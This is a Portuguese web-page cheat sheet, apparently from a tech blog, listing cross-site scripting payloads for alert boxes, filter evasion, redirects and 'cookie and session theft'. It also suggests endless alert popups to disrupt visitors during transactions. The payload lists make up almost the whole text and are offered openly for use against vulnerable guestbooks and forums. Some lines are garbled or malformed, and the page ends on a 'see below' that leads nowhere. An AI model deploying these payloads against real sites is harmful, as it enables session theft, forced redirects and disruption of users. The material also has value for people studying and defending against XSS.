Nesta seção, vamos olhar para uma série de filtros e exemplos de XSS (Cross Site Scripting) ataques destinados a sites e penetração com vulnerabilidades XSS, espero que possa ajudar e dar ideias. Mensagem de alerta XSS Com esse código, uma mensagem de aviso será gerada em toda a página vulnerável, a mensagem é modificada:
- <script>alert(“XSS”);</script>
- <IMG SRC=“javascript:alert(‘XSS’);”>
- <IMG SRC=javascript:alert(‘XSS’)>
- <IMG SRC=JaVaScRiPt:alert(‘XSS’)>
- <IMG SRC=javascript:alert(“XSS”)>
- <IMG SRC=`javascript:alert(“RM’XSS'”)`>
- <IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>“>
- <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
- <IMG SRC=“jav ascript:alert(‘XSS’);”>
- <IMG SRC=“jav ascript:alert(‘XSS’);”>
- <IMG SRC=”javascript:alert(‘XSS’);”>
- <IMG SRC=”javascript:alert(‘XSS’);”>
- <IMG SRC=” javascript:alert(‘XSS’);”>
- <IMG SRC=“javascript:alert(‘XSS’)”>
- <IMG DYNSRC=“javascript:alert(‘XSS’)”>
- <IMG LOWSRC=“javascript:alert(‘XSS’)”>
- <IMG SRC=‘vbscript:msgbox(“XSS”)’>
- <DIV STYLE=“background-image: url(javascript:alert(‘XSS’))”>
- <DIV STYLE=“background-image:07507206C028’06a06107606107306307206907007403a06106c065072074028.1027058.1053053027029’029”>
- <DIV STYLE=“background-image: url(javascript:alert(‘XSS’))”>
- <DIV STYLE=“width: expression(alert(‘XSS’));”>
- <BODY BACKGROUND=“javascript:alert(‘XSS’)”>
- <BODY ONLOAD=alert(‘XSS’)>
- <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
- <TABLE BACKGROUND=“javascript:alert(‘XSS’)”>
- <TABLE><TD BACKGROUND=“javascript:alert(‘XSS’)”>
Uma maneira simples de tocar o nariz para os usuários é de alertas de pontuação intermináveis. Isso vai forçá-los a matar o processo do navegador, por ter muitas abas. Se isso acontece no meio de uma transação ou outro momento importante de navegação pode ser desastroso para o usuário, este método é mais eficaz no livro de visitas ou fóruns vulnerável:
Redirecionamento XSS Para realizar um redirecionamento e fazer um site inacessível, podemos tentar usar document.location, window.location, location.replace location.assign e todos geram o mesmo resultado de redirecionamento:
- <script>document.location.href = “https://mundotecnologico.net/”;</script>
- <script>window.location = “https://mundotecnologico.net/”;</script>
- <script>location.assign(“”http://mundotecnologico.net/””);</script>
- <script>location.replace(“http://mundotecnologico.net/”);</script>
Robo de Cookie e Sessão A través da propiedad document.cookie podemos sacar o cookie que está utilizando o usuario:
- <script language=“javascript”>alert(“XSS Cookie: ” + document.cookie);</script
- <IMG SRC=“javascript:document.cookie=true;”>
- <IMG DYNSRC=“javascript:document.cookie=true;”>
- <IMG LOWSRC=“javascript:document.cookie=true;”>
- <IMG STYLE=“CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)”>
- <iframe src=”javascript:document.cookie=true;>
- <INPUT TYPE=“IMAGE” SRC=“javascript:document.cookie=true;”>
- <BODY BACKGROUND=“javascript:document.cookie=true;”>
- <BODY ONLOAD=document.cookie=true;>
- <BGSOUND SRC=“javascript:document.cookie=true;”>
- <BR SIZE=“&{document.cookie=true}”>
- <LINK REL=“stylesheet” HREF=“javascript:document.cookie=true;”>
- <TABLE BACKGROUND=“javascript:document.cookie=true;”>
- <DIV STYLE=“background-image: url(javascript:document.cookie=true;)”>
- <DIV STYLE=“background-image: url(javascript:document.cookie=true;)”>
- <DIV STYLE=“width: expression(document.cookie=true);”>
- <STYLE TYPE=“text/javascript”>document.cookie=true;</STYLE>
- <STYLE>.CrossSiteScripting{background-image:url(“javascript:document.cookie=true“);}</STYLE><A CLASS=CrossSiteScripting></A>
- <STYLE type=“text/css”>BODY{background:url(“javascript:document.cookie=true“)}</STYLE>
- <iframe src=”javascript:document.cookie=true;>
- <div onmouseover=“document.cookie=true;”>
- <div style=“background-image: url(javascript:document.cookie=true;);”>
- <div style=“width: expression(document.cookie=true;);”>
- <body onload=“document.cookie=true;”>
- <iframe src=”javascript:document.cookie=true;>
Caso queira um documento com muitos outros comandos, veja abaixo: